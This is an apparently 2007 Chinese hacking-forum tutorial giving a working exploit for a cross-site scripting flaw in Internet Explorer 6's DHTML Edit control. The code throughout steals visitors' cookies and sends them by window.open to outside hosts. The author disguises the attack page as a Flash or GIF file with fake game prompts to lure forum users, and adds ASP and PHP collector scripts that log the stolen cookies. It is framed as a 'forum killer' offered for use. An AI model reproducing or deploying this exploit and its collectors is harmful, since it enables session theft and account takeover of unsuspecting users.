MSIE DHTML Edit跨站腳本漏洞

更新時間：2007年01月16日 00:00:00 作者：

微軟在去年發(fā)布了MSIE DHTML Edit控件跨站腳本漏洞，但是圈內一直沒有公布出好用的EXP，害得一幫新手叫苦不迭，別急，這不是為大家送來了大餐嗎？！

[受影響系統(tǒng)]
Microsoft Internet Explorer 6.0
- Microsoft Windows XP Professional SP1
- Microsoft Windows XP Professional
- Microsoft Windows XP Home SP1
- Microsoft Windows XP Home
- Microsoft Windows ME
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 2000

[漏洞描述]
Microsoft Internet Explorer DHTML edit控件不正確過濾部分數(shù)據(jù)，遠程攻擊者可以利用這個漏洞進行跨站腳本攻擊，獲得敏感信息。DHTML編輯控件存在一個安全問題可被父窗口訪問，包括Script函數(shù)，攻擊者使用exeScript直接注入javascript到控件，當目標用戶打開惡意鏈接時，會導致惡意腳本代碼執(zhí)行，泄露敏感信息。
看來只能影響到IE 6.0版本，并且對Windows XP SP2沒有作用，不過沒有給XP打SP2補丁的用戶不在少數(shù)，這個漏洞的利用價值還是蠻大的。
由于我使用的是Windwos XP SP1正好存在這個漏洞，我們就先來測試一下吧，在本地建立如下內容的HTML頁面：
<html>
<head>
<title>測試</title>
</head>
<body onload="setTimeout('x.DOM.body.innerHTML=\'<b>正在裝載，請稍后
++++++++++++++</b>\'');setTimeout('main()',1000)">
<object
id="x"
classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A"
width="800"
height="600"
align="middle"
>
<PARAM NAME="ActivateApplets" VALUE="1">
<PARAM NAME="ActivateActiveXControls" VALUE="1">
</object>
<SCRIPT>
function shellscript()
{
window.name="poorchild";
open("http://www.hacker.com.cn/newbbs/announcements.asp?
action=showone&boardid=0","poorchild");
}
function main()
{
x.DOM.Script.execScript(shellscript.toString());
x.DOM.Script.setTimeout("shellscript()");
alert('等等++++++++++++++++++++++++++');
x.DOM.Script.execScript('alert(document.cookie)');
}
</SCRIPT>

</body>
</html>
用IE瀏覽器打開，如果你的系統(tǒng)存在這個漏洞，看出現(xiàn)了什么。
呵呵，彈出了我在黑防論壇上的Cookie信息。不過這個頁面利用起來很不方便，并且成功率不高，如果沒等到DHTML控件加載完畢就點擊確定，是不會彈出任何Cookie信息的。
沒等到頁面加載完畢就點擊彈出的第一個確定，一定會攻擊失敗，看來還是不足的。我們來對這個頁面進行一下補充和修改吧，使得它成為一個成功率高的偷取Cookie信息的網頁，好了，我們現(xiàn)在開始動手。
為了增加加載時間我們先將setTimeout('main()',1000)中的參數(shù)改大一些，就設成10000把，也就是10秒，夠長了。雖然頁面顯示著正在加載，但狀態(tài)欄中卻顯示著完畢，我們來修改狀態(tài)欄的文字，加入如下的函數(shù)：
function clock() {
var title="正在裝載，請稍后++++++++++++++";
status=title;
}
為了盡可能的誘使瀏覽者去打開這個頁面，我們把它改名成.swf格式的文件，即把此頁面?zhèn)窝b成一個Flash文件。在頁面中加入：
<object classid="clsid:D27CDB6E-AE6D-11CF-96B8-444553540000" id="obj1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" border="0" width="800" height="600">
<param name="movie" value="/college/UploadPic/2006/8/27/2006827233410827.swf">
<param name="quality" value="High">
<embed src="/college/UploadPic/2006/8/27/2006827233410827.swf" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" name="obj1" width="489" height="76" quality="High"></object>
同時隱藏DHTML控件，即將DHTML空間的width，height屬性設置成0。為了將Cookie發(fā)送，我們添加如下腳本：
x.DOM.Script.execScript("window.open('http://www.njrb.com.cn/comment/comment.php3?fdRealName=zhang&fdEmail=zhang@1.com&fdArticleId=&fdTitle=&fdLink=&func=add&s1=%B7%A2%B1%ED%C6%C0%C2%DB&fdComments='+document.cookie)");
這是為了測試方便，我將瀏覽者的Cookie信息發(fā)送到了網上一個發(fā)表評論的地方了。最終的測試頁面是：
<html>
<head>
<title>測試</title>
</head>
<body onload="setTimeout('x.DOM.body.innerHTML=\'<b>正在裝載，請稍后++++++++++++++</b>\'');clock();setTimeout('main()',10000)">
<object
id="x"
classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A"
width="0"
height="0"
align="middle"
>
<PARAM NAME="ActivateApplets" VALUE="1">
<PARAM NAME="ActivateActiveXControls" VALUE="1">
</object>
<SCRIPT>
function clock() {
var title="正在裝載，請稍后++++++++++++++";
status=title;
}

function shellscript()
{
window.name="poorchild";
open("http://www.hacker.com.cn/newbbs/announcements.asp?action=showone&boardid=0","poorchild");
}
function main()
{
x.DOM.Script.execScript(shellscript.toString());
x.DOM.Script.setTimeout("shellscript()");
alert("游戲名稱：神秘祭壇\n");
alert("測試通過者擁有著超人的觀察力！\n");
alert("全世界只有１０個人可以全部找出！\n");
alert("相信你就是這１０個人中的一員\n");
alert("祝你好運++++++++++++++++++++\n");
alert("務必在找到不同后點擊確定??！\n");
//x.DOM.Script.execScript('alert(document.cookie)');
x.DOM.Script.execScript("window.open('http://www.njrb.com.cn/comment/comment.php3?fdRealName=zhang&fdEmail=zhang@1.com&fdArticleId=&fdTitle=&fdLink=&func=add&s1=%B7%A2%B1%ED%C6%C0%C2%DB&fdComments='+document.cookie)");
}
</SCRIPT>

<object classid="clsid:D27CDB6E-AE6D-11CF-96B8-444553540000" id="obj1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" border="0" width="800" height="600">
<param name="movie" value="/college/UploadPic/2006/8/27/2006827233410827.swf">
<param name="quality" value="High">
<embed src="/college/UploadPic/2006/8/27/2006827233410827.swf" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" name="obj1" width="489" height="76" quality="High"></object>
</body>
</html>

其中的/college/UploadPic/2006/8/27/2006827233410827.swf是朋友發(fā)給我的地址，把我給下了一跳，不過沒想到我卻用它來騙稿費了，呵呵。
為了測試，趕快去黑防論壇發(fā)表一篇文章，要有吸引力才行。
夠有吸引力的了吧？我猜中招的一定不少！其實我們可以把以上的攻擊文件改名成.swf，為了在論壇上傳方便(不允許swf格式)，我改名為gif格式了。
由于它是利用的IE漏洞，這個頁面的地址可以在任意地方，不過注意：
function shellscript()
{
window.name="poorchild";
open("http://www.hacker.com.cn/newbbs/announcements.asp?action=showone&boardid=0","poorchild");
}

這個函數(shù)中定義了我們要偷取瀏覽者機器中站點的Cookie信息，我設置的是黑防論壇的，大家可以換成要攻擊的論壇。同時這個頁面也要選取內容少的頁面，最好不要帶圖片，以加快載入時間。
好，我自己就先來看看效果吧。

看來是成功了，為了不讓瀏覽者看到自己的的Cookie信息，可以把它發(fā)送到自己定制的ASP頁面，方法是在支持ASP和FSO組件的空間上建立以下頁面：
<%
testfile=Server.MapPath("cookie.txt")
cookie=Request("cookie")
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""&cookie& "")
thisfile.close
set fs = nothing
%>
將它命名為Cookie.asp，注意修改以下內容：
x.DOM.Script.execScript("window.open('http://www.njrb.com.cn/comment/comment.php3?fdRealName=zhang&fdEmail=zhang@1.com&fdArticleId=&fdTitle=&fdLink=&func=add&s1=%B7%A2%B1%ED%C6%C0%C2%DB&fdComments='+document.cookie)");
改為
x.DOM.Script.execScript("window.open('http://youwebsite.com/cookie.asp?cookie= '+document.cookie)");
或在支持PHP的空間建立以下頁面：
<?php
$info = getenv("QUERY_STRING");
if ($info) {
$fp = fopen("info.txt","a");
fwrite($fp,$info."\n");
fclose($fp);
}

header("Location: http://wwwhacker.com.cn");
這樣通過這個漏洞，我們就可以偷取到任何論壇的Cookie信息了，不管論壇做了多么安全，只要瀏覽者IE存在此漏洞，就可成功獲取別人的Cookie，這可稱得上是論壇殺手了！